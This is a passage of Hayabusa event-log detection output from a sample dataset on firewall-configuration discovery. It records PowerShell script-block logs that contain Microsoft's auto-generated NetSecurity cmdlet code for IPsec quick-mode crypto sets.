$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecQuickModeCryptoSet' function Get-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] 
${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] 
${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder =",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System 
Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] 
${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, 
